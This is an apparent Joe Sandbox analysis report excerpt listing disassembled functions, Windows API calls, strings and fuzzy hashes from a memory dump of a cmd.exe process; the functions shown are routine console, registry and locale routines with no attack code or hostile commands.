                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,00DA0AF0,00000002,?,?,00D7A669,%s %s ,?,?,00000000), ref: 00D699DC
                                                                                        • _get_osfhandle.MSVCRT ref: 00D699EC
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00D7A669,%s %s ,?,?,00000000), ref: 00D699F4
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D69A09
                                                                                          • Part of subcall function 00D69B3B: _get_osfhandle.MSVCRT ref: 00D69B4E
                                                                                          • Part of subcall function 00D69B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DA0AF0,000000FF,00D9A7F0,00002000,00000000,00000000), ref: 00D69B8E
                                                                                          • Part of subcall function 00D69B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F0,-00000001,?,00000000), ref: 00D69BA3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                        • String ID:
                                                                                        • API String ID: 4057327938-0
                                                                                        • Opcode ID: 4f5375c707ce285a29c0984a64ec9b211859a91a0f298386ec46e4e8d278bcd8
                                                                                        • Instruction ID: d9d4943581ee7ec86d4ffda2c10ee6871cbe6fa285a14a8ada14d6bea944b566
                                                                                        • Opcode Fuzzy Hash: 4f5375c707ce285a29c0984a64ec9b211859a91a0f298386ec46e4e8d278bcd8
                                                                                        • Instruction Fuzzy Hash: 8C212732344315AFD7386BB85C9AB3A629CDB85755F18503EFA0AC6281FFB0CC0486B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D69B3B Relevance: 9.1, APIs: 6, Instructions: 88fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D69B4E
                                                                                        • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DA0AF0,000000FF,00D9A7F0,00002000,00000000,00000000), ref: 00D69B8E
                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F0,-00000001,?,00000000), ref: 00D69BA3
                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00DA0AF0,?,?,00000000), ref: 00D7C0BC
                                                                                        • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DA0AF0,00001000,00D9A7F0,00002000,00000000,00000000,00DA0AEE), ref: 00D7C0DC
                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F0,00000000,?,00000000), ref: 00D7C0FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 3249344982-0
                                                                                        • Opcode ID: eb73e1ae728e0d214c2036382e80ebd49c1a7e581956eb3d95ebf74d7c7bac81
                                                                                        • Instruction ID: 2bc9bfe6f9eaeaea13c4ea058b7d3737d5d2fa44ad78cee7494df6386a5065ed
                                                                                        • Opcode Fuzzy Hash: eb73e1ae728e0d214c2036382e80ebd49c1a7e581956eb3d95ebf74d7c7bac81
                                                                                        • Instruction Fuzzy Hash: DE21A1B2650301BFEF204B68AC99F6BBB7DEB05750F104125F901E2290E7B09D00C7B5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D87540 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • _wcsicmp.MSVCRT ref: 00D875AC
                                                                                        • _wcsicmp.MSVCRT ref: 00D875CB
                                                                                        • _wcsicmp.MSVCRT ref: 00D875F1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmpwcschr$iswspace
                                                                                        • String ID: KEYS$LIST$OFF
                                                                                        • API String ID: 3924973218-4129271751
                                                                                        • Opcode ID: 14b374403b5e8c3a47cce99598f13b6cf0b35ddac13eba59d957edb4ca90baa2
                                                                                        • Instruction ID: 97796af8540248eea8abc1848a90aa45783b935e480370a2c68f37528dd617bb
                                                                                        • Opcode Fuzzy Hash: 14b374403b5e8c3a47cce99598f13b6cf0b35ddac13eba59d957edb4ca90baa2
                                                                                        • Instruction Fuzzy Hash: A0113A3160C701ABD31977299C4B867B798FBC5764379405EF506962C0EF60DA41C375
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6DD98 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00D6DDD6
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000001), ref: 00D6DDE5
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D6DDF0
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D6DDF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 513048808-0
                                                                                        • Opcode ID: 8f02b313cc2f222fa99e49d3c0bd856e685d86ae0d85b7874fa3d4aa3485a0e2
                                                                                        • Instruction ID: 58b5b2f938c7730f559a61db37abc63323715bea54e1e162fe8f58b91d52bcaa
                                                                                        • Opcode Fuzzy Hash: 8f02b313cc2f222fa99e49d3c0bd856e685d86ae0d85b7874fa3d4aa3485a0e2
                                                                                        • Instruction Fuzzy Hash: 0B11E333D04350ABD71157A8AD8CB7A36ADE747328F290316E851D22A0D7758D05DBF2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D69A11 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D69A1C
                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D6793A,00000104,?), ref: 00D69A2B
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A47
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A56
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A61
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A6A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                        • String ID:
                                                                                        • API String ID: 513048808-0
                                                                                        • Opcode ID: b5815246b5fe8489ced29e14313fc7691f2ccc9492bcc2be1b7c96c44f0ecf58
                                                                                        • Instruction ID: 5117cdecaf7cca54a353682747b780bdef984381b56527736a91cc02395a720f
                                                                                        • Opcode Fuzzy Hash: b5815246b5fe8489ced29e14313fc7691f2ccc9492bcc2be1b7c96c44f0ecf58
                                                                                        • Instruction Fuzzy Hash: D10186378042606B862157FC9D5D97ABBECE687734B290325F876D22D4DA74CD02D1B2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6DA30 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • memset.MSVCRT ref: 00D7D954
                                                                                        • longjmp.MSVCRT(00DA0A70,000000FF,00000000,00D925C2,00D925C0,?,?,?,?,00D6D980), ref: 00D7D96D
                                                                                        • memcpy.MSVCRT ref: 00D7D987
                                                                                        • longjmp.MSVCRT(00DA0A70,000000FF,00D925C2,00D925C0,?,?,?,?,00D6D980), ref: 00D7D9D3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                                        • String ID: 0123456789
                                                                                        • API String ID: 2034586978-2793719750
                                                                                        • Opcode ID: 9f44b17241b9059bdf12884135d512785306a887e5e5329e0e288287faaf9302
                                                                                        • Instruction ID: f3d6cc7a5962700180832149134e1eace986619479b3c3a8a8450448a5214d61
                                                                                        • Opcode Fuzzy Hash: 9f44b17241b9059bdf12884135d512785306a887e5e5329e0e288287faaf9302
                                                                                        • Instruction Fuzzy Hash: 1B712035F043069BDB24AF68AC4567A77B2EF84300F29816AE945D7384EB75DD06CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D65020 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D65074
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D6515F
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • iswspace.MSVCRT ref: 00D79289
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspacememset
                                                                                        • String ID: %s
                                                                                        • API String ID: 2220997661-3043279178
                                                                                        • Opcode ID: edbea384e003fa9f2ef166c7dcd99f912df3d02ab294bfa0aa970dc5a9fb86e3
                                                                                        • Instruction ID: 6e19cc9d5fd0b6ed280613404cf58b435023039c0119df049dd990035b92147e
                                                                                        • Opcode Fuzzy Hash: edbea384e003fa9f2ef166c7dcd99f912df3d02ab294bfa0aa970dc5a9fb86e3
                                                                                        • Instruction Fuzzy Hash: 2951D472A006169BCB24DBA89C5267AB3F5EF59310F18455EE849D7340FB34DD81CBB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D870D6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00D87121
                                                                                        • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00D87197
                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00D871FF
                                                                                        Strings
                                                                                        • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 00D870EE
                                                                                        • %WINDOWS_COPYRIGHT%, xrefs: 00D87107
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                        • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                                        • API String ID: 1103618819-4062316587
                                                                                        • Opcode ID: 4bab082ff6ddf76507f45309ea443973d37fbff46d4e7a22e6f455edba3a0290
                                                                                        • Instruction ID: 59f0ee130a62eb0625b76846a2b81d80d4777606d990cd02915c5f79530d31c8
                                                                                        • Opcode Fuzzy Hash: 4bab082ff6ddf76507f45309ea443973d37fbff46d4e7a22e6f455edba3a0290
                                                                                        • Instruction Fuzzy Hash: A641D335B003158BCB20EBA888547BA73A1FF88744F790469E946EB750EA65DE42C370
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D82584 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00D82652
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D82670
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D82694
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateSemaphore
                                                                                        • String ID: _p0$wil
                                                                                        • API String ID: 4049970386-1814513734
                                                                                        • Opcode ID: 33d55f722921a0fcdc277699f348e0e0bd562260590490f1f310c5a8bd8369ef
                                                                                        • Instruction ID: 8eea5c781f846d568b1774d5e25f8abff6cd5ec1442c8386c4dc72236643c6a8
                                                                                        • Opcode Fuzzy Hash: 33d55f722921a0fcdc277699f348e0e0bd562260590490f1f310c5a8bd8369ef
                                                                                        • Instruction Fuzzy Hash: 8F31A475A402198BCB25FF28CD9AABA73B5EF95710F1941A8E816D7350EA70DE40CB70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D851E8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcsnicmp.MSVCRT ref: 00D85295
                                                                                          • Part of subcall function 00D7727B: __iob_func.MSVCRT ref: 00D77280
                                                                                        • fprintf.MSVCRT ref: 00D85215
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: __iob_func_wcsnicmpfprintf
                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                        • API String ID: 1828771275-2781220306
                                                                                        • Opcode ID: 25ba573de7bf31a97a01e8521d7faa100340409380b586590aa54a0b44f930df
                                                                                        • Instruction ID: 9fd0f2f3021e210dbffd06303e3f946b09ec29f23a7705301cfb8f227194e445
                                                                                        • Opcode Fuzzy Hash: 25ba573de7bf31a97a01e8521d7faa100340409380b586590aa54a0b44f930df
                                                                                        • Instruction Fuzzy Hash: 3B312936E00615DBCF28BB68AC45B6EB761EF58700B190529EC0AA3245EE705E01C779
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6B3C1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6AB7F: iswspace.MSVCRT ref: 00D6AB8D
                                                                                          • Part of subcall function 00D6AB7F: wcschr.MSVCRT ref: 00D6AB9E
                                                                                        • wcschr.MSVCRT ref: 00D6B3FC
                                                                                        • wcschr.MSVCRT ref: 00D6B40E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspace
                                                                                        • String ID: &<|>$+: $=,;
                                                                                        • API String ID: 3458554142-2256444845
                                                                                        • Opcode ID: 2ef3759c1e2d0c9be59de56c2458bd31d5b73688e0a369eaf6bd454bff2ba1b7
                                                                                        • Instruction ID: eacd7964011a67f52b33995c55472ca883c93dc2c21ce9ea1f16e92254289306
                                                                                        • Opcode Fuzzy Hash: 2ef3759c1e2d0c9be59de56c2458bd31d5b73688e0a369eaf6bd454bff2ba1b7
                                                                                        • Instruction Fuzzy Hash: EB11E472A00155ABC7349B6AC45157AB7E6EFB6768B2D402BE8C4D7380FB319D81D331
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D64D42 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00D64D66
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00D64D8A
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D64D95
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00D64D5C
                                                                                        • UBR, xrefs: 00D64D82
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                        • API String ID: 3677997916-3870813718
                                                                                        • Opcode ID: 747a524e32a5bdb6e1f684806e6823ce4f69aba43cf8e8c09abe793577c18eed
                                                                                        • Instruction ID: 7e59fd44ca6b70716548a547ca774f83781b49139d4e5b190aae8852f1796395
                                                                                        • Opcode Fuzzy Hash: 747a524e32a5bdb6e1f684806e6823ce4f69aba43cf8e8c09abe793577c18eed
                                                                                        • Instruction Fuzzy Hash: B1013C76E40218BBDB21DB98DC49FEEBBB8EB84750F140166FA02F2180D3709A51DA64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6E2AF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,00D6B952), ref: 00D6E2D9
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,00000000,00D6B952), ref: 00D6E2F9
                                                                                        • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,00D6B952), ref: 00D7DC08
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleLocaleModuleProcThread
                                                                                        • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                        • API String ID: 886074793-2530943252
                                                                                        • Opcode ID: 3d3007c6b535fcaffa9d5257a09a6eac07266c156eb50e0b78f3b591bc31aa1f
                                                                                        • Instruction ID: b74a7af1183024c6ca1088ac26aba832d5d6fb95d4d817a6a074beefd936c285
                                                                                        • Opcode Fuzzy Hash: 3d3007c6b535fcaffa9d5257a09a6eac07266c156eb50e0b78f3b591bc31aa1f
                                                                                        • Instruction Fuzzy Hash: 35F09A35A00720ABCA105B28FD08A693764EB09B71B290301F815E33E0C7A09C01DBB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D6FCE9 Relevance: 7.8, APIs: 5, Instructions: 297COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D6FD3A
                                                                                        • wcsspn.MSVCRT ref: 00D6FF18
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D7000F
                                                                                          • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D3A
                                                                                          • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D44
                                                                                          • Part of subcall function 00D71CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D57
                                                                                          • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D61
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
